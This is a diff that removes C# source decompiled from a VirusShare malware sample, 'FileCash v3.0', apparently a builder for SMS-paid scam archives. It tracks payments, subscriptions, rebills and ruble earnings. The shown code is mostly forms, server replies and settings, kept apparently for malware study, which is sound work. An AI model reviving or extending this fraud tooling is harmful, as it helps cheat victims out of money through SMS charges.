Stream requestStream = httpWebRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = httpWebRequest.GetResponse();
StreamReader streamReader = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
string end = streamReader.ReadToEnd();
streamReader.Close();
response.Close();
switch (end)
{
case "erDel":
int num1 = (int) MessageBox.Show("Ошибка удаления архива!", "Ошибка", MessageBoxButtons.OK, MessageBoxIcon.Hand);
return (string) null;
case "erSDB":
int num2 = (int) MessageBox.Show("В настоящее время сервер базы данных не доступен!", "Ошибка", MessageBoxButtons.OK, MessageBoxIcon.Hand);
return (string) null;
case "erDB":
int num3 = (int) MessageBox.Show("В настоящее время база данных не доступна!", "Ошибка", MessageBoxButtons.OK, MessageBoxIcon.Hand);
return (string) null;
case "erDBq":
int num4 = (int) MessageBox.Show("Сбой запроса к базе данных!", "Ошибка", MessageBoxButtons.OK, MessageBoxIcon.Hand);
return (string) null;
case "msgNoArh":
int num5 = (int) MessageBox.Show("Список архивов пуст!", "", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
return (string) null;
case "msgNoStyle":
int num6 = (int) MessageBox.Show("Список стилей пуст!", "", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
return (string) null;
case "erAutId":
int num7 = (int) MessageBox.Show("Ошибка обновления идентификатора!", "Ошибка", MessageBoxButtons.OK, MessageBoxIcon.Hand);
Application.Exit();
break;
}
return end;
}
catch
{
int num = (int) MessageBox.Show("Не возможно подлючится к серверу!", "Ошибка", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
return (string) null;
}
}
public string MD5(string password)
{
byte[] bytes = Encoding.Default.GetBytes(password);
try
{
byte[] hash = new MD5CryptoServiceProvider().ComputeHash(bytes);
string str = "";
foreach (byte num in hash)
str = num >= (byte) 16 ? str + num.ToString("x") : str + "0" + num.ToString("x");
return str;
}
catch
{
throw;
}
}
}
}

View File

@ -1,241 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.NotifyWindow
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using FileCash_v3._0.Properties;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Threading;
using System.Windows.Forms;
namespace FileCash_v3._0
{
public class NotifyWindow : Form
{
private IContainer components;
private Label label1;
private Panel panel1;
private Label label5;
private Label label4;
private Label label3;
private Label label2;
private PictureBox pictureBox1;
private Label Sum;
private Label Rebils;
private Label Subs;
private Label Payd;
private Label Opened;
private BackgroundWorker backgroundWorker1;
private Rectangle rScreen = Screen.GetWorkingArea(Screen.PrimaryScreen.Bounds);
protected bool closePressed;
protected bool textPressed;
protected bool titlePressed;
protected bool closeHot;
protected bool textHot;
protected bool titleHot;
protected System.Windows.Forms.Timer viewClock;
public NotifyWindow.ClockStates ClockState;
private TimerResoultParam TimerParam;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.label1 = new Label();
this.panel1 = new Panel();
this.Sum = new Label();
this.Rebils = new Label();
this.Subs = new Label();
this.Payd = new Label();
this.Opened = new Label();
this.label5 = new Label();
this.label4 = new Label();
this.label3 = new Label();
this.label2 = new Label();
this.pictureBox1 = new PictureBox();
this.backgroundWorker1 = new BackgroundWorker();
this.panel1.SuspendLayout();
((ISupportInitialize) this.pictureBox1).BeginInit();
this.SuspendLayout();
this.label1.AutoSize = true;
this.label1.BackColor = Color.Transparent;
this.label1.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.label1.ForeColor = Color.White;
this.label1.Location = new Point(3, 20);
this.label1.Name = "label1";
this.label1.Size = new Size(124, 14);
this.label1.TabIndex = 1;
this.label1.Text = "Открытий: ................... ";
this.panel1.BackColor = Color.Transparent;
this.panel1.BackgroundImage = (Image) Resources.bg_popup;
this.panel1.Controls.Add((Control) this.Sum);
this.panel1.Controls.Add((Control) this.Rebils);
this.panel1.Controls.Add((Control) this.Subs);
this.panel1.Controls.Add((Control) this.Payd);
this.panel1.Controls.Add((Control) this.Opened);
this.panel1.Controls.Add((Control) this.label5);
this.panel1.Controls.Add((Control) this.label4);
this.panel1.Controls.Add((Control) this.label3);
this.panel1.Controls.Add((Control) this.label2);
this.panel1.Controls.Add((Control) this.pictureBox1);
this.panel1.Controls.Add((Control) this.label1);
this.panel1.Cursor = Cursors.Default;
this.panel1.Location = new Point(0, 0);
this.panel1.Name = "panel1";
this.panel1.Size = new Size(200, 120);
this.panel1.TabIndex = 2;
this.Sum.AutoSize = true;
this.Sum.BackColor = Color.Transparent;
this.Sum.Font = new Font("Arial", 11f, FontStyle.Bold, GraphicsUnit.Pixel, (byte) 204);
this.Sum.ForeColor = Color.White;
this.Sum.Location = new Point(45, 97);
this.Sum.Margin = new Padding(0);
this.Sum.Name = "Sum";
this.Sum.Size = new Size(32, 14);
this.Sum.TabIndex = 11;
this.Sum.Text = "Sum";
this.Rebils.AutoSize = true;
this.Rebils.BackColor = Color.Transparent;
this.Rebils.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.Rebils.ForeColor = Color.White;
this.Rebils.Location = new Point(124, 73);
this.Rebils.Name = "Rebils";
this.Rebils.Size = new Size(36, 14);
this.Rebils.TabIndex = 10;
this.Rebils.Text = "Rebils";
this.Subs.AutoSize = true;
this.Subs.BackColor = Color.Transparent;
this.Subs.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.Subs.ForeColor = Color.White;
this.Subs.Location = new Point(124, 58);
this.Subs.Name = "Subs";
this.Subs.Size = new Size(32, 14);
this.Subs.TabIndex = 9;
this.Subs.Text = "Subs";
this.Payd.AutoSize = true;
this.Payd.BackColor = Color.Transparent;
this.Payd.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.Payd.ForeColor = Color.White;
this.Payd.Location = new Point(124, 34);
this.Payd.Name = "Payd";
this.Payd.Size = new Size(31, 14);
this.Payd.TabIndex = 8;
this.Payd.Text = "Payd";
this.Opened.AutoSize = true;
this.Opened.BackColor = Color.Transparent;
this.Opened.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.Opened.ForeColor = Color.White;
this.Opened.Location = new Point(124, 20);
this.Opened.Name = "Opened";
this.Opened.Size = new Size(45, 14);
this.Opened.TabIndex = 7;
this.Opened.Text = "Opened";
this.label5.AutoSize = true;
this.label5.BackColor = Color.Transparent;
this.label5.Font = new Font("Arial", 11f, FontStyle.Bold, GraphicsUnit.Pixel, (byte) 204);
this.label5.ForeColor = Color.White;
this.label5.Location = new Point(3, 97);
this.label5.Name = "label5";
this.label5.Size = new Size(41, 14);
this.label5.TabIndex = 6;
this.label5.Text = "Итого:";
this.label4.AutoSize = true;
this.label4.BackColor = Color.Transparent;
this.label4.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.label4.ForeColor = Color.White;
this.label4.Location = new Point(3, 73);
this.label4.Name = "label4";
this.label4.Size = new Size(125, 14);
this.label4.TabIndex = 5;
this.label4.Text = "Ребилов: ...................... ";
this.label3.AutoSize = true;
this.label3.BackColor = Color.Transparent;
this.label3.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.label3.ForeColor = Color.White;
this.label3.Location = new Point(3, 58);
this.label3.Name = "label3";
this.label3.Size = new Size(125, 14);
this.label3.TabIndex = 4;
this.label3.Text = "Подписок / Отписок: ... ";
this.label2.AutoSize = true;
this.label2.BackColor = Color.Transparent;
this.label2.Font = new Font("Arial", 11f, FontStyle.Regular, GraphicsUnit.Pixel, (byte) 204);
this.label2.ForeColor = Color.White;
this.label2.Location = new Point(3, 34);
this.label2.Name = "label2";
this.label2.Size = new Size(124, 14);
this.label2.TabIndex = 3;
this.label2.Text = "Оплат(распаковок): ... ";
this.pictureBox1.Cursor = Cursors.Hand;
this.pictureBox1.Image = (Image) Resources.closebut;
this.pictureBox1.Location = new Point(177, 3);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new Size(20, 20);
this.pictureBox1.SizeMode = PictureBoxSizeMode.AutoSize;
this.pictureBox1.TabIndex = 2;
this.pictureBox1.TabStop = false;
this.pictureBox1.Click += new EventHandler(this.pictureBox1_Click);
this.backgroundWorker1.WorkerReportsProgress = true;
this.backgroundWorker1.DoWork += new DoWorkEventHandler(this.backgroundWorker1_DoWork);
this.backgroundWorker1.ProgressChanged += new ProgressChangedEventHandler(this.backgroundWorker1_ProgressChanged);
this.backgroundWorker1.RunWorkerCompleted += new RunWorkerCompletedEventHandler(this.backgroundWorker1_RunWorkerCompleted);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(200, 120);
this.Controls.Add((Control) this.panel1);
this.FormBorderStyle = FormBorderStyle.None;
this.Name = nameof (NotifyWindow);
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.Manual;
this.Text = nameof (NotifyWindow);
this.Load += new EventHandler(this.NotifyWindow_Load);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
((ISupportInitialize) this.pictureBox1).EndInit();
this.ResumeLayout(false);
}
public NotifyWindow(ref TimerResoultParam Tmparam)
{
this.TimerParam = Tmparam;
this.InitializeComponent();
this.Opened.Text = this.TimerParam.copencount;
this.Payd.Text = this.TimerParam.cunpackcount + " / " + this.TimerParam.cunpacksum + " руб.";
this.Subs.Text = this.TimerParam.csubs + " / " + this.TimerParam.coffsubs;
this.Rebils.Text = this.TimerParam.cmtrebils + " / " + this.TimerParam.cmtrebilsSum + " руб.";
int num = Convert.ToInt32(this.TimerParam.balance) - Convert.ToInt32(this.TimerParam.oldbalance);
if (num >= 0)
this.Sum.Text = " + " + (object) num + " руб.";
this.Location = new Point(this.rScreen.Width - this.Width - 2, this.rScreen.Height - this.Height - 1);
}
private void pictureBox1_Click(object sender, EventArgs e) => this.Close();
private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e) => Thread.Sleep(5000);
private void backgroundWorker1_ProgressChanged(object sender, ProgressChangedEventArgs e)
{
}
private void backgroundWorker1_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e) => this.Close();
private void NotifyWindow_Load(object sender, EventArgs e) => this.backgroundWorker1.RunWorkerAsync();
public enum ClockStates
{
Opening,
Closing,
Showing,
None,
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,42 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.PreparingArchivationParams
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.Windows.Forms;
namespace FileCash_v3._0
{
public class PreparingArchivationParams
{
public object Worker;
public object PBar;
public ListViewItem TaskListItem;
public string ArchiveXML;
public string[] ArchiveList;
public string ArchiveName;
public string ArchiveID;
public string MyIconPath;
public string MyPicturePath;
public string ArchivePassword;
public string ArchiveStyleName;
public string TmpName = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
public string TmpStyle = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
public int ArchiveLanguage;
public int ArchiveStyle;
public int AltPayCost;
public int SMS_Price;
public int PayType;
public int CalculateOpenCount;
public int UseAltPay;
public int ShowPrice;
public int FtpConn;
public string Antispam;
public string WorkerStep;
public bool ErrorN;
public int ArchivationType;
public int OldArchiveFileCount;
}
}

View File

@ -1,66 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.Program
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using CheckRunedCopy;
using FileCash_v3._0.Properties;
using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Windows.Forms;
namespace FileCash_v3._0
{
internal static class Program
{
[STAThread]
private static void Main()
{
if (!SingleInstance.IsFirstRun)
{
SingleInstance.ShowWindow("Form1");
}
else
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(Program.AppDomain_AssemblyResolve);
Application.Run((Form) new auth());
}
}
private static Assembly AppDomain_AssemblyResolve(object sender, ResolveEventArgs args)
{
if (args.Name.Contains("ZipForge"))
{
using (MemoryStream memoryStream = new MemoryStream(Resources.ZipForge_dll))
{
using (DeflateStream input = new DeflateStream((Stream) memoryStream, CompressionMode.Decompress))
{
using (BinaryReader binaryReader = new BinaryReader((Stream) input))
{
int count = 1048576;
return Assembly.Load(binaryReader.ReadBytes(count));
}
}
}
}
else
{
if (!args.Name.Contains("HtmlAgilityPack"))
return (Assembly) null;
using (MemoryStream input = new MemoryStream(Resources.HtmlAgilityPack))
{
using (BinaryReader binaryReader = new BinaryReader((Stream) input))
{
int count = 1048576;
return Assembly.Load(binaryReader.ReadBytes(count));
}
}
}
}
}
}

View File

@ -1,107 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.Properties.Resources
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace FileCash_v3._0.Properties
{
[CompilerGenerated]
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) FileCash_v3._0.Properties.Resources.resourceMan, (object) null))
FileCash_v3._0.Properties.Resources.resourceMan = new ResourceManager("FileCash_v3._0.Properties.Resources", typeof (FileCash_v3._0.Properties.Resources).Assembly);
return FileCash_v3._0.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => FileCash_v3._0.Properties.Resources.resourceCulture;
set => FileCash_v3._0.Properties.Resources.resourceCulture = value;
}
internal static Bitmap _1_1_newarchive => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("1.1_newarchive", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _1_2_spisok => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("1.2_spisok", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _1_3_zadachi => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("1.3_zadachi", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _1_4_proekti => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("1.4_proekti", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _1arch_active => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("1arch_active", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _1arch_noactive => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("1arch_noactive", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _1arch_noactive1 => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("1arch_noactive1", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _2_1_newstyle => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("2.1_newstyle", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _2_1_newstyle_grey => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("2.1_newstyle_grey", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _2_2_spisok => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("2.2_spisok", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _2_2_spisok_grey => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("2.2_spisok_grey", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _2style_active => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("2style_active", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _2style_noactive => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("2style_noactive", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _3_1_stat => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("3.1_stat", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _3_2_ftpacs => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("3.2_ftpacs", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _3_3_options => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("3.3_options", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _3other_active => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("3other_active", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap _3other_noactive => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject("3other_noactive", FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap background => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (background), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap bg_popup => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (bg_popup), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap but_webstat => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (but_webstat), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap centercash_mainform => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (centercash_mainform), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap centercash_mainform1 => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (centercash_mainform1), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap closebut => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (closebut), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static byte[] HtmlAgilityPack => (byte[]) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (HtmlAgilityPack), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap mainform => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (mainform), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static string prefix => FileCash_v3._0.Properties.Resources.ResourceManager.GetString(nameof (prefix), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static Bitmap screen4_03 => (Bitmap) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (screen4_03), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static byte[] TestAch => (byte[]) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (TestAch), FileCash_v3._0.Properties.Resources.resourceCulture);
internal static byte[] ZipForge_dll => (byte[]) FileCash_v3._0.Properties.Resources.ResourceManager.GetObject(nameof (ZipForge_dll), FileCash_v3._0.Properties.Resources.resourceCulture);
}
}

View File

@ -1,21 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.Properties.Settings
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace FileCash_v3._0.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}

View File

@ -1,32 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.TimerResoultParam
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
namespace FileCash_v3._0
{
public class TimerResoultParam
{
public string today;
public string week;
public string yesterday;
public string month;
public string balance;
public string oldbalance;
public string opencount;
public string unpackcount;
public string unpacksum;
public string mtrebils;
public string mtrebilsSum;
public string subs;
public string offsubs;
public string copencount = "0";
public string cunpackcount = "0";
public string cunpacksum = "0";
public string cmtrebils = "0";
public string cmtrebilsSum = "0";
public string csubs = "0";
public string coffsubs = "0";
}
}

View File

@ -1,246 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.auth
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Web;
using System.Windows.Forms;
using System.Xml;
namespace FileCash_v3._0
{
public class auth : Form
{
private IContainer components;
private Button login;
private GroupBox groupBox1;
private LinkLabel linkLabel1;
private CheckBox SaveMyLP;
private TextBox PasswordEbox;
private Label label2;
private Label label1;
private ComboBox LoginEbox;
private FileCash FCashObj = new FileCash();
private XmlDocument xmldoc;
private XmlNodeList xmlnode;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (auth));
this.login = new Button();
this.groupBox1 = new GroupBox();
this.LoginEbox = new ComboBox();
this.linkLabel1 = new LinkLabel();
this.SaveMyLP = new CheckBox();
this.PasswordEbox = new TextBox();
this.label2 = new Label();
this.label1 = new Label();
this.groupBox1.SuspendLayout();
this.SuspendLayout();
this.login.Location = new Point(166, 111);
this.login.Name = "login";
this.login.Size = new Size(153, 23);
this.login.TabIndex = 4;
this.login.Text = "Войти в программу";
this.login.UseVisualStyleBackColor = true;
this.login.Click += new EventHandler(this.login_Click);
this.groupBox1.Controls.Add((Control) this.LoginEbox);
this.groupBox1.Controls.Add((Control) this.linkLabel1);
this.groupBox1.Controls.Add((Control) this.SaveMyLP);
this.groupBox1.Controls.Add((Control) this.PasswordEbox);
this.groupBox1.Controls.Add((Control) this.label2);
this.groupBox1.Controls.Add((Control) this.label1);
this.groupBox1.Controls.Add((Control) this.login);
this.groupBox1.Location = new Point(5, 12);
this.groupBox1.Name = "groupBox1";
this.groupBox1.Size = new Size(326, 163);
this.groupBox1.TabIndex = 1;
this.groupBox1.TabStop = false;
this.groupBox1.Text = "Данные для авторизации";
this.LoginEbox.FormattingEnabled = true;
this.LoginEbox.Location = new Point(95, 31);
this.LoginEbox.Name = "LoginEbox";
this.LoginEbox.Size = new Size(224, 21);
this.LoginEbox.TabIndex = 1;
this.LoginEbox.SelectedIndexChanged += new EventHandler(this.LoginEbox_SelectedIndexChanged);
this.linkLabel1.ActiveLinkColor = Color.Black;
this.linkLabel1.AutoSize = true;
this.linkLabel1.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 204);
this.linkLabel1.LinkColor = Color.Black;
this.linkLabel1.Location = new Point(72, 143);
this.linkLabel1.Name = "linkLabel1";
this.linkLabel1.Size = new Size(247, 13);
this.linkLabel1.TabIndex = 6;
((Label) this.linkLabel1).TabStop = true;
this.linkLabel1.Text = "Получить учетную запись (Регистрация)";
this.linkLabel1.LinkClicked += new LinkLabelLinkClickedEventHandler(this.linkLabel1_LinkClicked);
